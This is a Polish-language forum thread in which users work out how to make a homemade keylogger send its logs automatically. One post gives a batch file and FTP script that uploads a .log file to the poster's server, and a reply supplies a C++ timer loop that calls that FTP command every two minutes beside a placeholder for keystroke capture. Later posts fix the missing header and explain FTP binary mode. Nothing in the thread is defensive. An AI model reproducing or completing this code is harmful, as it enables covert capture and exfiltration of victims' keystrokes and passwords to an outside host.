Dodawanie bat w C++

Blade955

Użytkownik
Dołączył
Luty 24, 2008
Posty
23
Witam!
Znalazłem prosty sposób na wysyłanie logów na FTP:
W pliku coś_tam.bat pisze:
Kod:
@echo off 

ftp -v -i -s:1.txt mój.host.pl

A w pliku 1.txt:
Kod:
login

hasło

binary 

put c:plik_który_ma_być_wysłany.log  plik_który_ma_być_wysłany.log

bye
Samo wysyłanie działa, zapisuje na serva itp... A teraz jak to podczepić pod keyloga, tak żeby wysyłało to np. co 15 minut

//Tutuaj było coś nie zgodnego z regulaminem... Przepraszam, ale nie wczytałem się za bardzo w regulamin... ;] Ale już nadrobiłem "zaległości"... :mruga:
 

Blade955

Użytkownik
Dołączył
Luty 24, 2008
Posty
23
Mozna jaśniej... (ucze się C++ od niedawna, więc moja wiedza nie jest "obszerna")
Bo z tego co tam widac, mało kumam... ;]
 

Blade955

Użytkownik
Dołączył
Luty 24, 2008
Posty
23
czyli, że jak... Jak dodam do mojego kodu, to będzie się samoczynnie co jakiś czas odpalać... bo nie widzę tutaj nic takiego...
A wyraźnie prosiłem o kodzik dzięki któremu będzie się samoczynnie uruchamiać... ;]
 

sinis

Użytkownik
Dołączył
Wrzesień 3, 2006
Posty
958
Kod:
int timeToSend = time(NULL) + 120; // Wysyła log co 2 minuty

while (true)

{

 // Kod keyloga (pobieranie i zapisywanie znaczków)

 if (timeToSend < time(NULL))

 {

  timeToSend += 120;

  system("ftp -v -i -s:1.txt mój.host.pl"); // Wysłanie logu

 }

}

Proponuję nauczyć się najpierw programowania, tak będzie łatwiej zrozumieć ten kod.
 

Bretos

Użytkownik
Dołączył
Styczeń 11, 2008
Posty
142
Sorry sinis, ale ten kodzior jakoś tak niezbyt działa, jeżeli Tobie działa to pokaż jakiś przykład(chodzi mi o cały kod czegokolwiek).
 

sinis

Użytkownik
Dołączył
Wrzesień 3, 2006
Posty
958
Originally posted by Bretos
Sorry sinis, ale ten kodzior jakoś tak niezbyt działa, jeżeli Tobie działa to pokaż jakiś przykład(chodzi mi o cały kod czegokolwiek).
Afff... Wsadź to w obojętnie co... Dodaj tylko nagłówek time.h (#include <time.h>). Wg. mnie programowania nie zaczyna się od skomplikowanych projektów, tylko projekt po projekcie pisze się coś bardziej precyzyjnego i rozbudowanego...
 

Bretos

Użytkownik
Dołączył
Styczeń 11, 2008
Posty
142
Dziękuję
smile.gif
właśnie nie wiedziałem czemu mi nie działa tzn jaka biblioteka
smile.gif


[ Dodano: 06-03-2008, 18:36 ]
BTW. o co chodzi z tym binary (chodzi mi o plik .log)i jeszce jedno, w opisie "how to" pisze ze plik 1.txt a w tym kodzie jest plik .log to zapewne nie ma znaczenia ale chcę się upewnić
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
z tym binary to chodzi o to ze nie pytaj o wszystko co mozesz znalesc w google/wikipedia

binary to jedno z komend ftp i zmienia tryb przesylania z ASCII na binarny np. zebys mogl przeslac zdjecie
 
Do góry Bottom